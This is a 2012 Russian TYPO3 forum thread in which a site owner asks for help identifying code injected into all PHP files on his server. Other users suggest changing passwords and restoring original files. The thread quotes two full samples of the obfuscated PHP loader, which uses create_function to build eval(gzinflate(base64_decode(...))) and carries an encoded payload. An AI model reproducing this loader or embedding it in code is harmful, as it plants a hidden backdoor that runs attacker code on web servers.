Russian TYPO3 community Форум больше не используется. Присоединяйтесь к каналу #community-ru в Slack for TYPO3 community  

Вернуться   Russian TYPO3 community > Обсуждение общих технических вопросов > Общие вопросы

Ответ
 
Опции темы Опции просмотра
Старый 25.10.2012, 15:40   #1
semender
Senior Member
 
Аватар для semender
 
Регистрация: 06.08.2010
Адрес: Makhachkala
Сообщений: 142
Отправить сообщение для semender с помощью ICQ Отправить сообщение для semender с помощью Skype™
Question Помогите что за вирус?

недавно на всех typo3 сайтах на одном из моих серверов, во всех php файлах обнаружил добавленным такой код. Вот пытаюсь расшифровать, никак не выходит, помогите пожалуйста.

PHP код:
$md5 "89bc86968a0ff8960b640edcf06de95e";
$a6 = array('t',"_","6",'4',"n",'z','g','c',")",'s','f',"l","i","a","v",'b','$','d',"e","o",';',"r",'(');
$b65 create_function('$'.'v',$a6[18].$a6[14].$a6[13].$a6[11].$a6[22].$a6[6].$a6[5].$a6[12].$a6[4].$a6[10].$a6[11].$a6[13].$a6[0].$a6[18].$a6[22].$a6[15].$a6[13].$a6[9].$a6[18].$a6[2].$a6[3].$a6[1].$a6[17].$a6[18].$a6[7].$a6[19].$a6[17].$a6[18].$a6[22].$a6[16].$a6[14].$a6[8].$a6[8].$a6[8].$a6[20]);
$b65('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'); 
видно что создается функция
PHP код:
function  lambda($v)
{
return eval(
gzinflate(base64_decode($v)));
}; 
Но при вызове в таком порядке текст всё равно не читаем.
__________________
Я чертовски люблю слушать ложь, смотря в глаза... особенно когда знаю правду... И никогда не вру людям,которых называю друзьями...
semender вне форума   Ответить с цитированием
Старый 25.10.2012, 18:49   #2
Ивано
Guest
 
Сообщений: n/a
Angry

Возможно Вы поставили что то левое - или кто-то взломал-поиграл...
Что добавляет этот код - если это php - то нужно искать файл, который перезаписывает файлы...

У меня был случай - после работы по FTP во всех js-файлах был добавлен уродский код... Из-за него антивирусы блокировали сайт.
Он добавлялся из одного места и постепенно при запросе новых страниц, распространился на весь сайт - во все js скрипты...

Лечил очень просто...
Заменил все что *.js на оригинал из скачанного с сайта typo3.org

Т.к. у Вас php- то скорее всего кто-то уже знает пароль к FTP...
  Ответить с цитированием
Старый 25.10.2012, 18:51   #3
Ивано
Guest
 
Сообщений: n/a
По умолчанию

Сюдя по тому, что он выполняет функцию eval - значит это какая-то команда.
Можно попробовать вместе расшифровать - если показать все что есть по вирусу...
  Ответить с цитированием
Старый 25.10.2012, 20:08   #4
dmartynenko
Senior Member
 
Аватар для dmartynenko
 
Регистрация: 20.07.2007
Адрес: Беларусь, Минск
Сообщений: 957
Отправить сообщение для dmartynenko с помощью ICQ
По умолчанию

А что еще из ПО у вас стоит на сайтах?
У нас один раз похожую заразу залили через дыру в OpenX.

В любом случае рецепт - сменить все пароли. Заменить файлы ядра на оригинальные. Из экстов - либо вручную, либо тоже обновить через репозиторий (если все их него).
dmartynenko вне форума   Ответить с цитированием
Старый 25.10.2012, 23:00   #5
semender
Senior Member
 
Аватар для semender
 
Регистрация: 06.08.2010
Адрес: Makhachkala
Сообщений: 142
Отправить сообщение для semender с помощью ICQ Отправить сообщение для semender с помощью Skype™
По умолчанию

Цитата:
Сообщение от Ивано Посмотреть сообщение
Возможно Вы поставили что то левое - или кто-то взломал-поиграл...
Что добавляет этот код - если это php - то нужно искать файл, который перезаписывает файлы...

У меня был случай - после работы по FTP во всех js-файлах был добавлен уродский код... Из-за него антивирусы блокировали сайт.
Он добавлялся из одного места и постепенно при запросе новых страниц, распространился на весь сайт - во все js скрипты...

Лечил очень просто...
Заменил все что *.js на оригинал из скачанного с сайта typo3.org

Т.к. у Вас php- то скорее всего кто-то уже знает пароль к FTP...
да да, я так и делаю: в ext отчищаю вручную,файлы движка заменяю оригинальными из новоскаченного, перенес все сайты на другой сервер,переустановил этот. Сейчас мне интересно что ж он делает та такого злодейского)
__________________
Я чертовски люблю слушать ложь, смотря в глаза... особенно когда знаю правду... И никогда не вру людям,которых называю друзьями...
semender вне форума   Ответить с цитированием
Старый 25.10.2012, 23:04   #6
semender
Senior Member
 
Аватар для semender
 
Регистрация: 06.08.2010
Адрес: Makhachkala
Сообщений: 142
Отправить сообщение для semender с помощью ICQ Отправить сообщение для semender с помощью Skype™
По умолчанию

Цитата:
Сообщение от Ивано Посмотреть сообщение
Сюдя по тому, что он выполняет функцию eval - значит это какая-то команда.
Можно попробовать вместе расшифровать - если показать все что есть по вирусу...
я понял что выполняется, только вот как раскодировать последнее???
ну так это и есть всё что есть, в каждом файле такое, свой md5 и свой массив.Но функция одна и та же по видимому.
PHP код:
<?php
$md5 
"b7673e7d076c0db93f15da24c610a75e";
$a6 = array(";",'l',"(","z","a",'n','d','$',"_","4",'t','g','v',"r",'c',"6","f",'e',"i",'s',')','b','o');
$b61 create_function('$'.'v',$a6[17].$a6[12].$a6[4].$a6[1].$a6[2].$a6[11].$a6[3].$a6[18].$a6[5].$a6[16].$a6[1].$a6[4].$a6[10].$a6[17].$a6[2].$a6[21].$a6[4].$a6[19].$a6[17].$a6[15].$a6[9].$a6[8].$a6[6].$a6[17].$a6[14].$a6[22].$a6[6].$a6[17].$a6[2].$a6[7].$a6[12].$a6[20].$a6[20].$a6[20].$a6[0]);
$b61('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');
?>
__________________
Я чертовски люблю слушать ложь, смотря в глаза... особенно когда знаю правду... И никогда не вру людям,которых называю друзьями...
semender вне форума   Ответить с цитированием
Старый 25.10.2012, 23:11   #7
semender
Senior Member
 
Аватар для semender
 
Регистрация: 06.08.2010
Адрес: Makhachkala
Сообщений: 142
Отправить сообщение для semender с помощью ICQ Отправить сообщение для semender с помощью Skype™
По умолчанию

Цитата:
Сообщение от dmartynenko Посмотреть сообщение
А что еще из ПО у вас стоит на сайтах?
У нас один раз похожую заразу залили через дыру в OpenX.

В любом случае рецепт - сменить все пароли. Заменить файлы ядра на оригинальные. Из экстов - либо вручную, либо тоже обновить через репозиторий (если все их него).
Вроде никаких сторонних скриптов нет...Стоит ещё wordpress на серваке.Интересно что его даже не затронуло,там этого кода ни в каких файлах нет.Почему-то именно typo3.
__________________
Я чертовски люблю слушать ложь, смотря в глаза... особенно когда знаю правду... И никогда не вру людям,которых называю друзьями...

Последний раз редактировалось semender; 25.10.2012 в 23:25
semender вне форума   Ответить с цитированием
Старый 25.10.2012, 23:39   #8
Ивано
Guest
 
Сообщений: n/a
Cool

Не пойму, откуда Вы взяли function lambda($v)
И откуда create_function?

У меня получилось только
eval(gzinflate(base64_decode($v)));


Мурашки по коже...
  Ответить с цитированием
Старый 25.10.2012, 23:43   #9
semender
Senior Member
 
Аватар для semender
 
Регистрация: 06.08.2010
Адрес: Makhachkala
Сообщений: 142
Отправить сообщение для semender с помощью ICQ Отправить сообщение для semender с помощью Skype™
По умолчанию

Цитата:
Сообщение от Ивано Посмотреть сообщение
Не пойму, откуда Вы взяли function lambda($v)
И откуда create_function?

У меня получилось только
eval(gzinflate(base64_decode($v)));


Мурашки по коже...
Эт я просто написал, create_function — Создаёт анонимную (лямбда) функцию, чтоб легче подставить можно было для выполнения.Скопировал с кода, когда тэстил.
__________________
Я чертовски люблю слушать ложь, смотря в глаза... особенно когда знаю правду... И никогда не вру людям,которых называю друзьями...
semender вне форума   Ответить с цитированием
Старый 25.10.2012, 23:50   #10
Ивано
Guest
 
Сообщений: n/a
По умолчанию

Каково значение переменной $v?
eval(gzinflate(base64_decode($v))); - что сюда передается?

Последний раз редактировалось Ивано; 26.10.2012 в 00:10
  Ответить с цитированием
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB code is Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Срочно помогите кто может, что за ошибка? semender Общие вопросы 0 05.05.2011 20:05
Помогите определиться с cms (игровой сайт) zverushka Вопросы выбора CMS 1 16.11.2009 19:12
Не пойму что с кодировкой или с локализацией maaboo Общие вопросы 3 22.07.2008 00:51
Освоение Typo3 от начала до конца, всё разжёвано :) premier FAQ (Часто задаваемые вопросы) 69 19.04.2007 16:47


Часовой пояс GMT +4, время: 08:49.


Работает на vBulletin® версия 3.8.1.
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Перевод: zCarot

Хостинг и техническая поддержка: TYPO3 Лаборатория